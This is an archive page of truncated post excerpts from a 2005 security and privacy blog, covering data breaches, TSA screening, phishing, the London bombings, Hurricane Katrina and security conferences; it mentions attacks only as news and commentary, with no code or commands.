Before I get into this post, I’d like to say I have a great deal of sympathy for the individuals whose lives, but nothing else, have been saved. However, I find the comparisons to the Indian ocean tsunami to be irresponsible and wrong. Sample quote: Biloxi Mayor A.J. Holloway said the storm’s damage was overwhelming, […]

 

Four Alleged Terrorist Plotters Indicted in LA

The head of a radical Islamic prison gang and three others were “on the verge” of carrying out attacks against U.S. military sites, synagogues or other Los Angeles-area targets when police foiled the alleged plot, prosecutors said. From “Four indicted in alleged terrorist plot against LA-area targets.” The Counterterror blog has some analysis and links […]

 

Disaster Preparedness

Researchers from the non-profit Rand Corp. looked at the ability of local agencies to meet federal standards for responding to urgent-case reports of infectious diseases like bubonic plague, anthrax or botulism. Of 19 local public health agencies called in 18 states, only two met the U.S. Centers for Disease Control and Prevention’s standards, which include […]

 

New Orleans is Not a Morality Play

Enter narrator: I pray you all give your audience, And hear this matter with reverence, By figure a moral play – The Flooding of New Orleans called it is, That of our lives and ending shows How transitory we be all day. Enter preacher, Sturm und Drang… It has nothing to do with Southern Decadence, despite […]

 

"The Offending Articles Will Be Disposed Of"

Our Saudi allies, displaying their tolerance: Paper cups with Hebrew writing disturbed both employees and medical staff at King Khaled National Guard Hospital on Saturday. The catering subcontractor for the hospital coffee shops began using them on Saturday after their usual supply ran out. “We were shocked and angry,” said an employee. “How can Israeli […]

 

The Gulf Coast

The scale of destruction from Katrina is simply staggering. The Red Cross, and other good organizations could use your help. I do wonder if Pompeii isn’t a better analogy than others being brought up, such as the Indian Ocean Tsunami or Hiroshima. As an aside, I expect there will be fake charity sites set up, […]

 

Impressions of Opera

Having taken advantage of Opera’s offer (still valid for a few hours!) I must say, I’m impressed. Opera is snappy in a way that Safari (with all the plugins I’ve added) is not. There’s some small bits of things not working as I expect, things that should be controlled differently*, as I move, but there […]

 

Happy Birthday Opera

The Opera browser, which some friends rave about, is now ten years old! To celebrate, they’re offering free full copies if you send a note to “registerme@opera.com” before midnight tonight. The registered copies do not have the ad bar. Woot!

 

ParadisePoker.com Blackjack Cracked

An article in the summer 2005 issue of 2600 magazine (“The Hacker Quarterly”) discusses a timing attack on the Paradise Poker Blackjack game. In essence, the game reveals when the dealer’s hole card is a 10, because it takes longer to process that situation. (The article isn’t online, near as I can tell.) There’s more […]

 

Companies Helping Phishers

Daniel Solove has a good post on “How Companies Help Phishers and Fraudsters.” Companies have trouble being consistent in what they send, and that’s to the advantage of fraudsters. They also have a hard time taking security information from outsiders, however well meaning. I had an experience with Citi Mastercard. After some problems, I was […]

 

Colossus, Anon Blogging, and International Blogging

In PGP’s CTO Corner, Jon Callas draws attention to the second world war Colossus computer: The Colossus Rebuild Project took 10 years and 6,000 hours of effort. The resulting machine is not a replica of a Colossus, but an actual Colossus that uses some of the actual parts. The team finished a Mark II Colossus […]

 

Oxford No Longer Accepting "Child Prodigies"

Yinan Wang, the 14-year-old Chinese boy who clinched a place at Oxford University last week, will be the last child prodigy to study there under reforms being considered by admissions tutors. Despite an almost perennial flurry of headlines on children barely in their teens being offered places, the university is considering an unprecedented blanket rule […]

 

Cease and Desist, or I Shall Embarrass Myself Some More!

It used to be that to mock lawyers sending cease and desist letters, you had to be elite Swedish file traders. (Or Phrack. Phrack used to mock their correspondents, too, before they got all corporate.) But now, even gadget blogs can play, and play Gizmodo does, when some bunch of lawyers sends them a letter […]

 

Homeland Security Blanket

By Amy Franceschini. See the complete work at Future Farmers. It’s not new, but Gizmodo picked it up and reminded us.

 

ChartOne, 3,851 SSNs+Medical Records, System Administrator

On Aug. 1, UF was notified that a computer was stolen from ChartOne, a Boston-based firm that the Health Science Center contracts with to help manage medical records. In the laptop’s database were the names, Social Security numbers, dates of birth and medical record numbers for more than 3,000 patients spread over a wide area. […]

 

Enforcement and Incentives

In “Getting Serious about Smog,” Virginia Postrel writes: After many years of bureaucratic resistance, California is finally getting serious about air pollution from cars. These days, most cars don’t spew much pollution. But the few that do, account for a lot, and many of them still manage to pass state inspection. Now, the LAT reports, […]

 

WiKID Goes Open Source

WiKID is a two-factor authentication system. It consists of: a PIN, stored in the user’s head; a small, lightweight client that encapsulates the private/public keys; and a server that stores the public keys of the clients and the user’s PIN. When the user wants to login to a service, they start the client and enter […]

 

"Preserving the Internet Channel Against Phishers"

I’ve updated the concepts first presented in “Don’t Use Email Like a Stupid Person” and “More on Using Email Like A Stupid Person,” to make them more palatable to readers. The new short essay is “Preserving the Internet Channel Against Phishers,” and is designed to be shared with marketing folks without insulting them. Alternate title: […]

 

Speaking of Hot Knives, Butter

It seems that Zylon “bulletproof” vests are not nearly as effective as Kevlar ones, and the Justice department may pull funding for purchasing them. (All the press releases and reports are at the DOJ site.) They are, however, more effective than not wearing a vest. I am routinely outraged here by poor technology decisions that […]

 

Robertson Lies In Apology

The dominant headline around Robertson’s attempt to retract his comments is that he “apologized.” That is false. He claimed to have not called for an assassination: “I said our special forces could take him out. Take him out could be a number of things including kidnapping.” Mark, at Cutting Edge of Ecstasy takes out goes […]

 

Small Bits: Alex Haislip, Chinese Censorship, TSA Xrays

Alex Haislip is blogging up a storm at VC Action. I love journalist bloggers; there’s so much interesting backstory that they talk about. And working at Red Herring, Alex has more dirt than he could dish and stay in business. 😉 Curt Hopkins points to a fascinating story about the folks who run the great […]

 

No Child Left Untagged

CSO’s Security Feed has a story “RFID Technology Prevents Infant Abduction.” The story reads like a press release: VeriChip Corporation, a subsidiary of Applied Digital (ADSX), a provider of security and identification technology, stated that its “Hugs” RFID infant protection system prevented the abduction of a baby at Presbyterian Hospital in Charlotte, North Carolina. A […]

 

From the "Who Will Rid Me Of This Meddlesome Priest" Department…

Television evangelist Pat Robertson told viewers the U.S. should kill Venezuelan President Hugo Chavez to prevent the Latin American country from becoming a “launching pad” for extremism, the Associated Press said. From Bloomberg. Ezra Klein has comments in It Was The Christian Thing To Do. Apparently, Venezuela is upset. Thanks to Nick for distracting me […]

 

Caption Contest

I took this picture of a sign, lying on its side, near gate A12 of the Atlanta airport on August 16th, 2005. The photo is what I saw; it has not been retouched. It needs a caption, and I am simply flabbergasted.

 

Released!

Captchas are those annoying, spamateur “type this so we can stop spam” things that you see on some blogs. PWNtcha stands for “Pretend We’re Not a Turing Computer but a Human Antagonist”, as well as PWN capTCHAs. This project’s goal is to demonstrate the inefficiency of many captcha implementations. For an overview on why visual […]

 

Blogroll Rolls On

I’ve deleted Geoff’s ScreenDiscussion for negligent posting, and added Mario’s blog, Ed and Diana at Security Curve and TQBF and his service-oriented chargen 19/udp.

 

"FBI: Businesses (Still) Reluctant To Report Cyber Attacks"

Volubis picks up stories in Information Week and Computer World: Roughly 20% of businesses report computer intrusions annually, a figure the agency believes is low. Director Robert Mueller urged businesses to step forward, promising greater sensitivity from the FBI in return. This reluctance has become especially important at a time when identity theft is growing […]

 

Demand Your Records

In her “On the Record” blog, Ann Harrison (Hi Ann!) covers how to use the Privacy Act to request the records TSA collected, illegally, on millions of innocent people. Incidentally, Arthur Andersen was shut down for destroying data like this.

 

US Air Force Hack and TSA

I just blogged about a breach of data which could be used for ID theft in “US Air Force, 33,000 SSNs, Hacker.” I’d like to tie that to a story I mentioned earlier this week, “TSA May Loosen Ban on Razorblades, Knives:” The Aug. 5 memo recommends reducing patdowns by giving screeners the discretion not […]

 

US Air Force, 33,000 SSNs, Hacker

In : Half of USAF’s officers’ PII stolen, Chris points to stories about “AFPC notifies Airmen of criminal activity exposing personal info,” and “Air Force investigates data breach.” AMS, an online program used for assignment preferences and career management, contains career information on officers and enlisted members as well as some personal information like birth […]

 

"Its Precious Patents Disclosed"

In Lee Kuan Yew is usually worth reading, Tyler Cowen discusses a Lee Kuan Yew interview, where Lee mentions ‘intellectual property’ law as a place Singapore can stay ahead of its competitors. Mr Lee says: Such as where the rule of law, intellectual property and security of production systems are required, because for them to […]

 

No Child Left Alone

The EFF is directing attention to the Leave My Child Alone! coalition. Did you know that President Bush’s No Child Left Behind Act mandates that public high schools turn over private student contact information to local military recruiters or risk losing federal education funding? Not only that, but the Pentagon has compiled a database of […]

 

TSA to Look Through Your Clothes

[Update: Welcome Buzzflash readers! If you enjoy this post, please have a look around, you might enjoy the air travel or privacy category archives.] USA Today reports “TSA hopes modifications make X-ray not so X-rated.” The TSA now hopes to test modified “backscatter” machines in a few airports this fall that will solve the privacy […]

 

I'm a Spamateur

In private email to Justin “SpamAssassin” Mason, I commented about blog spam and “how to fix it,” then realized that my comments were really dumb. In realizing my stupidity, I termed the word “spamateur,” which is henceforth defined as someone inexperienced enough to think that any simple solution has a hope of fixing the problem.

 

Tor GUI Contest

The announcement says: Tor is a decentralized network of computers on the Internet that increases privacy in Web browsing, instant messaging, and other applications. We estimate there are some 50,000 Tor users currently, routing their traffic through about 250 volunteer Tor servers on five continents. However, Tor’s current user interface approach — running as a […]

 

300,000 words and counting

It’s my one year blogiversary. In that time, about 300,000 words including comments and trackbacks have been posted in 957 articles. That’s a little over 2.6 articles a day, some of which some of you seem to have enjoyed reading. Movable Type added about 40,000 words of html tags, colon tagged junk etc. So, really, […]

 

Avoid Parkhill's Waterfront Grill in Allenhurst, NJ

Two diners on a date at a fancy Jersey Shore restaurant were furious when they saw the check — which listed their table as that of the “Jew Couple.” … Stein said he took the offensive bill and showed it to Jewish friends seated nearby who said they could not believe it. When the group […]

 

Your Questionable Content (redux)

Thanks for your patience, I think we’ve solved the problem. Some comments may be moderated, but the rejection should be done. Please email if there are any more rejections.

 

TSA Sued by Real Americans

A group of Alaskans have gotten tired of being jerked around by TSA and filed suit in the US District Court in Anchorage. Read the story at TSA Secrecy Must Stop.

 

Where's the Evidence?

Tom Ptacek offers up unsubstantiated rumors, and Lindstrom caves? Shoot. I did my chrooting DNS work when a customer’s DNS servers came under attack. Can I get beer without naming the customer? I thought Pete was demanding full details. None of the attacks I saw used are less than five years old. More seriously, I […]

 

TSA Roundup

Allow me to begin by shocking my regular readers with a few words of praise for TSA: Ryan Singel reports that they found a bomb, in “Screeners ID IED.” Of course, that’s 1 bomb:1,000,000 nail clippers, but still. It’s good to see that they can find the bombs. When they’re not harassing babies […]

 

Your Questionable Content

A couple of people have mentioned that something in the comment posting code is rejecting their comments for “questionable content.” I’m very sorry, and am working with my fine technical support staff to try to solve it. If this happens to you, please email me: emergentchaos & gmail & com, and I’ll try to post […]

 

The Malaysia Option

Sunday’s Washington Post has a story, “U.S. Lowers Sights On What Can Be Achieved in Iraq:” The Bush administration is significantly lowering expectations of what can be achieved in Iraq, recognizing that the United States will have to settle for far less progress than originally envisioned during the transition due to end in four months, […]

 

The Death of Jean Charles de Menezes

Remember that bulky jacket-wearing, fare-skipping young foreigner who taught the world that it’s a bad idea to act suspiciously near public transportation after a terrorist attack? The UK’s Observer investigates, and among other things finds: Initial claims that de Menezes was targeted because he was wearing a bulky coat, refused to stop when challenged and […]

 

More on Using Email Like a Stupid Person

[Update: A less in-your-face version is Preserving the Internet Channel Against Phishers.] There have been lots of good comments, both here and over at Nielsen Hayden’s Making Light. There’s a few points left dangling that I wanted to respond to further. Those are the “ignore the marketing department” view and the “train the customer” view. […]

 

Don't Use Email Like a Stupid Person

[Update: A less in-your-face version is Preserving the Internet Channel Against Phishers.] In his talk at Defcon, David Cowan talked about how he doesn’t bank online anymore. Banks are now facing the imminent destruction of their highest bandwidth, lowest cost way to interact with customers. Actually, it’s worse than that. Bankers are killing online banking, […]

 

On Vacation

I’m on vacation through Sunday, and won’t be blogging until next week.

 

Lindstrom's Indemnification

Pete Lindstrom has very nicely offered to indemnify me, and pay my outrageous consulting fees when no one else will, if only I break NDAs and disclose which 0day exploits were used against which of my clients. Well, the city of Tokyo…No, I’ve never worked for the city of Tokyo. Now, as I’ve said repeatedly, […]

 

Sonoma State, 61,709 SSNs, Hacker

Hackers have broken into Sonoma State University’s computer system, where they had access to the names and Social Security numbers of 61,709 people who either attended, applied, graduated or worked at the school from 1995 to 2002, university officials disclosed Monday. So says SF Chronicle. Sonoma State has a page.

 

Costco Employees and "Market Analysts"

The job of a shareholder-owned company is to make money for shareholders, not to coddle its employees. But sometimes, being good to your employees can be good for the shareholders. In “Living the Dog’s Life at Costco,” Kevin Carson takes to task Wall St analysts who are trying to run Costco’s business for them: “He […]

 

New Blog Pointers

Frequent commenter Allan Friedman has started Geek/Wonk. In “Speaking of duct tape,” he links to an interesting essay Duct Tape Risk Communication. And Mario’s comments on tor vs the Freedom Network are interesting: Interestingly, the usability issues are _exactly_ the same as they were ~5 years ago! It’s sometimes s-l-o-w! While I agree with this, […]

 

University of North Texas, 34,000 SSNs, Bad Design + Google

The UNT server storing the electronic university housing records of about 34,000 current, former and prospective students was accessed by a computer hacker. In addition, an Internet-based form available to students to make inquiries to the UNT financial aid office mistakenly created a file containing personal information of the current and former students who used […]

 

Cal Poly, 31,077 SSNs, Hacker

Notices went out on Thursday to 31,077 people informing them that their records might have been stolen after Cal Poly Pomona discovered two computer servers were compromised in late June. “We got hit by a hacker,” said Debra Brum, interim vice president of instructional and information technology. Personal data, including names and Social Security numbers […]

 

Microsoft's "monkeys" find first zero-day exploit

Microsoft’s experimental Honeymonkey project has found almost 750 Web pages that attempt to load malicious code onto visitors’ computers and detected an attack using a vulnerability that had not been publicly disclosed, the software giant said in a paper released this month. So reports Rob Lemos, in “Microsoft’s “monkeys” find first zero-day exploit.” We’ve […]

 

Balancing Information Sharing and Privacy Concerns

I’ll be at the National Conference on Science, Technology and the Law, A National Institute of Justice Conference sponsored by the National Clearinghouse for Science, Technology, and the Law, September 12-14, 2005, St. Petersburg, Florida. I’m on a panel with a great group of folks on “Balancing Information Sharing and Privacy Concerns.” We haven’t put […]

 

Life Imitates Art

America’s Finest News source reports that “Our Global Food-Service Enterprise Is Totally Down For Your Awesome Subculture” while the New York Times covers “Hip-Hop Argot Meets Corporate Cant, All to Sell Chryslers.” One story or the other contained the line: Sometimes it feels like nobody understands your rebellious, genre-defying crew of goth-rocker pals—am I right? […]

 

Two on Security Clearance

Richard Bejtlich talks about the backlog in security clearances in “Opportunity Costs of Security Clearances,” using an anecdote about an unnamed agency trying to hire someone “clearable” to train to do complex work that requires particular skills and orientation. Meanwhile, at Cutting Edge of Ecstasy, Mark writes about “A Mexican man who used a fake […]

 

Two On ID Theft

Newsfactor has a long story, “U.S. Passes the Buck on Identity Theft,” which discusses the Identity Theft Penalty Enhancement Act of 2004, some of a current crop of products designed to reduce ID theft risks at businesses, and the need to shift liability. Speaking of shifting liability, in “Despite Claims of “Exceptional” Security, Acxiom’s Defenses […]

 

Make Fire With Water, Electricity

This Aqueon Fireplace, from Heat and Glo, separates water into hydrogen and oxygen, and then burns them. Because the hydrogen burns cleanly (unlike, say, wood or gas), there’s no need to ventilate. As if you needed more proof that science trumps idiocy. I look forward to having six hydrogen burners in my stove. Because that […]

 

Passport Forgery Legal in UK?

The arrest of the Algerian-born Briton with 452 forged European passports at Bangkok’s Don Muang airport is only the latest in incidences of document forging in Thailand. … But here’s the rub: The suspect, 35 year old Mahieddine Daikh, may not be charged with any crime. To date none of the governments whose forged passports […]

 

The Control Impulse, The Security Canard, and The Boy Who Cried Wolf

Flyertalk brings us the story of Continental Airlines and Boston’s Logan Airport having a little spat. The core of the dispute is that Continental offers its customers Wifi access for free. But Boston wants to charge for it. Boston has always had a bit of a control thing. That’s not unique. There are lots of […]

 

Short Bits on Terrorism

Thurston points to “London blasts – expert comments” at the London School of Economics. I know you all come here for the bombast and snark, so be warned: These are trained professionals. Do not try this on your blog. Boydite William Lind reports on the “Modern Warfare Symposium,” organized by (ret) Colonel Mike Wyly. The […]

 

Flag Desecrations?

Over at Sivacracy, Ann Bartow is running a series of pictures on flag desecration.

 

Real American Heroes

Marty Lederman has a long post, “The Heroes of the Pentagon’s Interrogation Scandal — Finally, the JAG Memos” about the Judge Advocate Generals of the Armed Forces, who took a stand against the President’s position that the United States could behave as it has at Guantanamo and elsewhere: The memos are extraordinary. They are written […]

 

Defcon Coverage?

Defcon is better experienced than read about. How could I argue with a slogan like “What happens in Vegas gets posted to thousands of blogs? stays in Vegas?” But when those involved blog about it, I’ll admit to a little involvement: I recruited Brian Krebs onto team Shmoo. Because everyone knows I’m a Shmoo wannabe. […]

 

The Fifth Workshop on the Economics of Information Security (WEIS 2006)

Ross Anderson has announced that the fifth WEIS will be held in Cambridge (England) 26-28 June 2006. Papers due March of next year. I’m sad that I’ve only made one of the WEIS workshops so far. (Life keeps interfering.) What’s there is amongst the most interesting bits being done in security. I hope they continue […]

 

CalTech, One Planet, Hacker

In the spirit of my personal information breach posts, I present to you the South African Sunday Independent’s story, “Hacker ‘outs’ news of the 10th planet of our solar system:” Brown has submitted a name for the new planet to the International Astronomical Union, which has yet to act on the proposal, but he did […]

 

Question Authority: The Life You Save May Be Your Own

Gary Wolf has an article in Wired this month: In fact, the people inside the towers were better informed and far more knowledgeable than emergency operators far from the scene. While walking down the stairs, they answered their cell phones and glanced at their BlackBerries, learning from friends that there had been a terrorist attack […]

 

The Alexis Park ATMs are Perfectly Safe

Hackaday posts pictures in “defcon day 2 – don’t use the atm.” I don’t trust the ATMs at any Defcon haunt anymore, and was surprised to see a fellow I respect stick his ATM card into the machine at Hamburger Mary’s. I do wonder if any of the well-dressed guys using the ATMs were adding […]

 

Long Bits of Stuck in McCarran International Airport

Kudos to McCarran International Airport (Las Vegas) for having free wifi. And congrats to my fellow Defcon attendees for stealing the cookie that authenticates me to this blog off that wireless net. Tech Policy points to Bill West at Counterterror blog, in “Liberty & Security vs. Terror – an American Perspective.” It’s worth reading in […]

 

At Black Hat

I’m at Black Hat and Defcon through Sunday, and blogging will be light, and slightly error-prone.

 

Why Not Accept Random Searches?

In comments, Izar asks why we feel that having policemen check up on us is an affront to our liberty. He also asks that we call him a “serf of the totalitarian state machine,” so I shall. I suppose I might feel differently if, regularly, people around me were being murdered by terrorists. But the […]

 

Job Openings

My friend and colleague Scott Blake is looking for smart people: I have openings for 5 information security analysts. Level of seniority is negotiable, but I prefer senior-level folks. I’m looking for the following specialties: security awareness training/communications, secure application development, risk assessment, network architecture, and security policy development. I also have an opening for […]

 

Are Police the Best Response?

A few weeks ago, it came out that the MTA wasn’t spending their security budget: In December 2002, the Metropolitan Transportation Authority announced it had completed a lengthy assessment of potential threats to the city’s transportation infrastructure, from subway lines to major bridges. The authority, which had begun the study in the weeks after the […]

 

Canadian Telco Telus Blocks access to Union Website, How to Access

Michael Geist has the scoop at “Telus Blocks Subscriber Access to Union Website.” Short version: Telus and their union are fighting. Telus has chosen to prevent their customers from reaching “Voices for Change,” the union website. I urge Telus customers to call customer support and ask what’s up. Repeatedly. Voices for Change also suggests […]

 

Risks of Data Collection and Use

David Cowan tells a sad story about his experience with unauthorized data collection and use in “Freshman Week.” Speaking of unauthorized data collection and use, Jonathan Krim reports that “License-Screening Measure Could Benefit Data Brokers:” Jason King, spokesman for the American Association of Motor Vehicle Administrators, said commercial data brokers are notorious for refusing to […]

 

If You Have Nothing to Hide…

In “Behind-the-Scenes Battle on Tracking Data Mining,” the New York Times reports that the Department of Justice really does care about privacy, and really doesn’t want those nosy Congressional committees poking about how the government operates. So, why should they care? Are they hiding something? Of course, this being a New York Times article, there’s […]

 

105°. But It's a Dry Heat

It’s going to be 105 (or so) in Las Vegas for Blackhat, and, as always, a little hotter for Defcon. Tickets for the DC702 Summit/EFF Benefit are for sale online through Monday. As a smaller, private event, I expect the AC will work. So you should be there, instead of say, lolling about by the […]

 

What Do You Have to Do To Get Fired Here?

Ryan Singel has the scoop. The GAO report to Congress is also covered in the New York Times, “Flight Database Found to Violate Privacy Law:” “Careless missteps such as this jeopardize the public trust and D.H.S.’ ability to deploy a much-needed, new system,” Senator Susan Collins, Republican of Maine, wrote on Friday to Secretary Michael […]

 

Consent, Submit, Forest, Trees

Kip Esquire has a good post, “On ‘Consenting’ versus ‘Submitting’ to a Search.” The upshot is: If you happen to be stopped for a search such as this, you should not say “Yes I consent” or “Sure, go ahead.” Rather try saying something like “I consent to nothing, but if you are requiring me to […]

 

Iowa State, 2,037 SSNs and 2,379 CC, "Hacker"

The Iowa State University is sending out a warning to alumni Wednesday after a hacker had access to the alumnae association Web site. A computer at Iowa State University’s Alumni Association was hacked into, allowing outside access to thousands of Social Security numbers and pages of credit card information. … By tapping into the computer, […]

 

New York to Randomly Beat People In Hopes of Beating Terrorists

Police will begin randomly beating people entering city subways, officials announced Thursday after a new series of bomb attacks in London. “We just live in a world where, sadly, these kinds of security measures are necessary,” Mayor Michael Bloomberg said. “Are they intrusive? Yes, a little bit. But we are trying to find that right […]

 

"Not the Blitz"

So says SteveC, and he’s right: It’s a relatively small group of criminals. At the same time, I can’t agree with his feeling that “These bombings occurred in all probability because of our unprovoked invasion.” The United States was attacked before we invaded Iraq or Afghanistan. People who will kill civilians on the tube are […]

 

Small Bits: Privacy for Infringers, IEEE Cipher, Oracle, Footnotes, and a Mug

Michael Geist continues to take the Privacy Commissioner’s office to task for protecting the privacy of infringers: Moreover, the Commissioner canvassed other banks and found that at least two others did allow their customers to opt-out of such marketing. Now if only the Commissioner would reveal which banks respected their customers’ privacy and which decided […]

 

These cruel, wanton, indiscriminate bombings

With London being attacked again, I am heartened to see that the attacks were (apparently) less effective, and otherwise defer to the wisdom of Sir Winston Churchill: These cruel, wanton, indiscriminate bombings of London are, of course, a part of Hitler’s invasion plans. He hopes by killing a large number of civilians, women and children, […]

 

Happy Moon Day!

36 years ago today, two Americans landed on the moon before returning safely to Earth. It’s a feat worth celebrating.

 

Elizabeth Blodgett Hall, 1909-2005

Elizabeth Blodgett Hall, 95, founder of Simon’s Rock College, died July 18 at Geer Nursing and Rehabilitation Center in Canaan, Conn. In 1964, with 200 acres of her family’s land and a grant of $3 million from the Margaret Kendrick Blodgett Foundation — a charitable educational trust established by her mother — she founded America’s […]

 

Who Has Time For This, Indeed?

David Cowan has a nice post on technologies he won’t fund, and why. It’s a great post. More investors should be up front about what they’re not interested in. Bessemer has funded 16 security startups–more than any other traditional VC firm–but there are some areas of security that even we have never funded, despite the […]

 

Cardsystems Death Penalty?

“CardSystems has not corrected, and cannot at this point correct, the failure to provide proper data security for those accounts,” said Tim Murphy, Visa’s senior vice president for operations in a memorandum sent to several banks. “Visa USA has decided that CardSystems should not continue to participate as an agent in the Visa system.” So […]

 

More on the FBI and ACLU

Over at Volokh, Orin Kerr writes “The New York Times ACLU Story Begins to Look A Bit Fishy.” The essence of Kerr’s argument is that with the ACLU’s request for any document mentioning the ACLU, of course they’re going to get a lot of documents: I should point out that it is at least theoretically […]

 

Oh, That's Why

Last week, I asked, Now, if Evan Kohlmann can get to this gathering, and if John Walker-Lindh can meet bin Ladin, why haven’t we penetrated and shut down more groups which are openly calling for murder? Today’s New York Times has the answer in “Large Volume of F.B.I. Files Alarms U.S. Activist Groups:” WASHINGTON, July […]

 

Acxiom, 8.2 gb of love, Bad Password

In “Acxiom’s High Tech Hacker,” Ryan Singel describes how Scott Levine downloaded 8.2 gb of data that customers had uploaded to an Acxiom FTP server. The server was misconfigured, and anyone could login and see other people’s data. “According to law enforcement, the individual arrested was a known sophisticated hacker. He evidentially gained access through […]

 

Fingerprints at Disney: The Desensitization Imperative

The Walt Disney Corporation has started fingerprinting all visitors to their parks. They claim, incorrectly, that the fingerprint scans can’t be turned into pictures of fingerprints. True Americans understand that fingerprinting is for criminals. A presumption of guilt — of criminality — underlies a company taking your fingerprints. In “Welcome to Disney World, please let […]

 

Dear Adium People…

You make a very nice client. But the “Remove Contact” menu item in the Contact menu is fucking broken. It is not clear that “Remove Contact” means “Blow away this entire group of contacts.” How about (1) making the item name plural, and (2) adding the list of contacts to be deleted to the warning […]

 

David Cowan Blogging

David Cowan (Hi David!) is the partner at Bessemer Ventures who is responsible for their security portfolio. So I’m hoping that he sticks with his new blog, “Who has time for this.” His post about Too Many Security Startups? is fascinating: The night I closed our investment in my 12th data security deal, Cyota, my […]

 

A New Birth of Freedom in Iraq?

The Committee to Protect Bloggers reports that prominent Iraqi blogger Khalid Jarrar has been taken into custody by the Iraqi mokhabarat, or secret service. Jarrar is author of Secrets in Baghdad and is the brother of Raed from Raed in the Middle. B.L. Ochman has the scoop. Raed has more. If the United States is […]

 

Small Bits of Irony

CSO Magazine’s Security Feed juxtaposes two stories, “Stolen Data Worries Financial Institutions” and “EU Ministers Promise Data Retention Agreement.” The Privacy Law has an article on fingerprinting at Disney. His blog won’t allow anonymous comments, so I’ll say read “Fingerprint Privacy.” (I’m with Nancy Kerrigan, anyway.) Chris Hoofnagle has a story about a new database […]

 

Small Bits: Silver Linings, Presidential Game Theory, Disclosure, War

Privacy Law lists the 16 states that now have notification laws. Thanks, Choicepoint! At Balkin, ‘JB’ has a long discussion of why 2nd term Presidents all seem to be scandal ridden…since the 22nd Amendment took away what game theorists call ‘the long uncertain shadow of the future.’ I nearly said something about ‘experimental confirmation’ here, […]


Nothing to Hide, but "Nothing to Hide"

You’ve heard of the tube, of lorries and bobbies, but “cleanskins?” It’s a word that has emerged from London after last week’s bombings. The English police believe the suspects in the case are “cleanskins” – young operatives with no background of terrorism or crime. It’s more difficult to investigate cleanskins because they have no criminal […]


Pre-Defcon Summit, Get Your Tickets Now

The fine folks at DC702 are going to be hosting a “pre-Defcon Summit” and fundraiser for the EFF. I’m pleased to be a featured guest, and urge you to show up, contribute to the EFF, and hang out. According to email organizers sent, they’re fast running out of tickets, so get your tickets now, and […]


Blue Cross of Arizona, 57,000 SSNs + Medical Data, Arizona Biodyne

The Arizona Republic brings us the news that “Medical firm’s files with personal data stolen:” The personal information of 57,000 Blue Cross Blue Shield of Arizona customers was stolen from a Phoenix-based managed care company. Arizona Biodyne, an affiliate of Magellan Health Services that manages behavioral health for Blue Cross of Arizona, began last Friday […]


Nelson-Smith Data Protection Bill

Kim Zetter reports in Wired, “Bill Strives to Protect Privacy:” Another bill introduced in the Senate judiciary committee about two weeks ago addresses some of the same issues in a comprehensive way, and several other bills address individual issues, such as notification to consumers. The commerce bill, however, is likely to go the distance […]


Blind Signature Patent Expiration Party

Friends, colleagues, and co-conspirators, It has been 17 long years and now the time is finally here to celebrate at the: BLIND SIGNATURE PATENT EXPIRATION PARTY WHAT: A party to celebrate the expiration of the Blind Signature patent. WHY: U.S. Patent 4,759,063 (“Blind Signature Systems”) to David Chaum is the core invention enabling privacy-protecting electronic […]


Alberta Health and Wellness, 670,000 Health Care Numbers, Tape

Frank Work, Alberta’s Information and Privacy Commissioner, released a report on his investigation into missing Health and Wellness computer data storage tape. Work stated the incident is a low risk for potential fraud. As soon as the incident was reported, Alberta Health and Wellness changed practices and eliminated the related tape transfer business process. … […]


Homegrown Bombers, ID Cards, Intelligence Activity, and Profiling

The folks over at The Counterterrorism Blog have been doing a great job the last week or so. Lots of very high quality posts, good roundups around the London attacks. I wanted to point and comment on several of their recent posts. First is Where do Homegrown British Suicide Bombers Come From?, a first person […]


"Israeli Style Profiling"

Less useful is another call for “Israeli style profiling,” in Bill West’s Bolstering Transit Security the Old Fashioned Way: The more such officers there are, and the better trained they are, especially if they are trained in behavioral profiling techniques like the Israeli security services have used for decades, the better protected these transportation systems […]


On Phishing

Item: OCC Guidance on Phishing Websites. Ethan Preston writes: The Office of the Comptroller of the Currency provided guidance for banks on appropriate countermeasures against phishing websites. The guidance provides fairly common sense advice: designate employees to respond to phishing threats, cultivate contacts with the FBI to expedite law enforcement’s response, prepare to identify […]


My Bleeding Snort Rules Just Alerted Me to TERRORISM!

Err, no. But I was reading a post at TaoSecurity, “How to Misuse an Intrusion Detection System:” I was dismayed to see the following thread in the bleeding-sigs mailing list recently. Essentially someone suggested using PCRE to look for this content on Web pages and email: (jihad |al Qaida|allah|destroy|kill americans|death|attack|infidels) (washington|london|new york) But such rules […]


Comrade Sarbanes Remains Uncorrupted

The latest critic of Sarbanes-Oxley? Michael Oxley told the International Corporate Governance Network (ICGN) annual conference yesterday that, ‘if I had another crack at it, I would have provided a bit more flexibility for small- and medium-sized companies.’ Always nice to see a fellow own up to his mistakes. From Accountancy Age, via Volubis Infosec […]


New Security Blogs

Jeff Moss takes blogging into thematically and visually new territory with The Black Pages, with Jeff posting on a theme, and then his speakers adding details. Now if only they had an RSS feed. Or my post. I wonder which they’ll get first? I have a soft spot for the word “chaos.” I like the […]


Small Bits of Liberty

Rebecca MacKinnon’s “Response to Scoble” is worth reading in its entirety. I have just one small comment: In justifying Microsoft’s filtering of politically sensitive Chinese words on MSN spaces, Microsoft’s uber-blogger Robert Scoble writes: “I have ABSOLUTELY NO BUSINESS forcing the Chinese into a position they don’t believe in.” He continues… Except Scoble Microsoft is […]


Pre-Defcon Summit, and some small bits

The fine folks at DC702 are going to be hosting a “pre-Defcon Summit” and fundraiser for the EFF. I’m pleased to be a featured guest, and urge you to show up, contribute to the EFF, and hang out. Hmmm, this needs some extra text to balance the icon. Dumb stylesheet. Who the heck wrote that […]


Random Thoughts on Specter-Leahy

Senators Specter and Leahy have proposed a new law on identity theft and privacy. Some thoughts as I read it. But first, what the hell are they doing preventing me from copying sections? Frigging DRM. Quotes shall be shorter than they otherwise would. Title III, 301.b.1 (pg21): “A data broker shall, upon the request of […]


Gaze Into Navels!

There’s a new feed, of posts + comments, available here: RSS. (It’s also in the little “blog tech stuff” list, if you want to come back to see it later.) Thanks to Lisa for setting this up!


MSU, 27,000 SSNs, "intrusion"

More than 27,000 students were informed by e-mail on Tuesday that their Social Security numbers could have been compromised by an attack on the College of Education’s server. The server housed information that included student names, addresses, student courses and personal identification numbers. After the intrusion was discovered at the beginning of April, the server […]


Small Bits on Privacy

Larry Ponemon has a good article in Computerworld, “After a privacy breach, how should you break the news?:” We learned that about one-third of subjects believed that the notification was truthful. Another 41% believed that the notice they received failed to communicate all the facts. The remaining 26% were unsure about the integrity or honesty […]


ID Card Program Stopped Over Security Concerns

